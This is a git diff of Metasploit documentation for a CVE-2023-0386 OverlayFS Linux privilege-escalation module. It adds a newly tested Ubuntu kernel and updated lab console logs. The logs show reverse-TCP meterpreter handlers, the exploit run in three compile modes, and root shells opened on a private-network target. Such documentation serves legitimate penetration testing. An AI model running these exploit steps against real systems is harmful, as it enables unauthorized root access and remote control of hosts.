Update doc

Takahiro-Yoko · Takahiro-Yoko · commit b8f1bc3da248 · 2024-09-09T08:40:08.000+09:00
diff --git a/documentation/modules/exploit/linux/local/cve_2023_0386_overlayfs_priv_esc.md b/documentation/modules/exploit/linux/local/cve_2023_0386_overlayfs_priv_esc.md
@@ -13,6 +13,7 @@ The vulnerability affects:
 This module was successfully tested on:
 
     * Ubuntu kernel version 5.13.0-1021-oem on x64/amd64
+    * Ubuntu kernel version 6.0.19-060019-generic on x64/amd64
 
 ### Install
 
@@ -59,99 +60,87 @@ as serving as a location to store the various files and directories created by t
 The default value is `/tmp`
 
 ## Scenarios
-### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=Auto
+### Ubuntu 6.0.19-060019-generic x64/amd64 COMPILE=Auto
 ```
 msf6 > use exploit/multi/handler
 [*] Using configured payload generic/shell_reverse_tcp
 msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp
 
 [*] Started reverse TCP handler on 192.168.56.1:4444 
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54776) at 2024-09-05 22:48:42 +0900
+[*] Sending stage (3045380 bytes) to 192.168.56.10
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.10:59844) at 2024-09-09 08:22:36 +0900
 
 meterpreter > getuid
 Server username: ubu
 meterpreter > background 
 [*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
 msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto
 
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
-[*] Writing '/tmp/.a4HSc5ks' (334 bytes) ...
+[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
+[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
+[*] Writing '/tmp/.AHeqRyKHX/.2zkk6' (1068952 bytes) ...
 [*] Launching exploit...
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[+] Deleted /tmp/.a4HSc5ks
-[+] Deleted /tmp/.Smx0d11hH
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54778) at 2024-09-05 22:49:28 +0900
+[+] Deleted /tmp/.AHeqRyKHX
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.10:54770) at 2024-09-09 08:23:02 +0900
 
 meterpreter > getuid
 Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.10
+OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
 ```
 
-### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=True
+### Ubuntu 6.0.19-060019-generic x64/amd64 COMPILE=True
 ```
-msf6 > use exploit/multi/handler
-[*] Using configured payload generic/shell_reverse_tcp
-msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp
-
-[*] Started reverse TCP handler on 192.168.56.1:4444 
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54710) at 2024-09-05 22:45:40 +0900
-
-meterpreter > getuid
-Server username: ubu
-meterpreter > background 
-[*] Backgrounding session 1...
-msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True
 
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
-[*] Writing '/tmp/.uKkt1jtoJ' (334 bytes) ...
+[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
+[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
+[*] Writing '/tmp/.cvnVjW/.j3OSujf' (1068952 bytes) ...
 [*] Launching exploit...
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[+] Deleted /tmp/.uKkt1jtoJ
-[+] Deleted /tmp/.oaqii9pj
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54712) at 2024-09-05 22:46:19 +0900
+[+] Deleted /tmp/.cvnVjW
+[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.10:51750) at 2024-09-09 08:23:28 +0900
 
 meterpreter > getuid
 Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.10
+OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
 ```
 
-### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=False
+### Ubuntu 6.0.19-060019-generic x64/amd64 COMPILE=False
 ```
-msf6 > use exploit/multi/handler
-[*] Using configured payload generic/shell_reverse_tcp
-msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp
-
-[*] Started reverse TCP handler on 192.168.56.1:4444 
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54616) at 2024-09-05 22:36:45 +0900
-
-meterpreter > getuid
-Server username: ubu
-meterpreter > background 
-[*] Backgrounding session 1...
-msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
-[*] Using configured payload linux/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False
 
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
-[*] Writing '/tmp/.9tZar0/cve-2023-0386' (2215928 bytes) ...
-[*] Writing '/tmp/.Z37h3bkJpw' (334 bytes) ...
+[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
+[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
+[*] Writing '/tmp/.wWno7SA/.Bv3HUIrHyr' (18712 bytes) ...
+[*] Writing '/tmp/.wWno7SA/.r1nzG9LZ' (16824 bytes) ...
+[*] Writing '/tmp/.wWno7SA/.g0QNeF' (1068952 bytes) ...
 [*] Launching exploit...
-[*] Sending stage (3045380 bytes) to 192.168.56.102
-[+] Deleted /tmp/.Z37h3bkJpw
-[+] Deleted /tmp/.9tZar0
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54618) at 2024-09-05 22:37:31 +0900
+[+] Deleted /tmp/.wWno7SA
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.10:33860) at 2024-09-09 08:23:50 +0900
 
 meterpreter > getuid
 Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.10
+OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
 ```
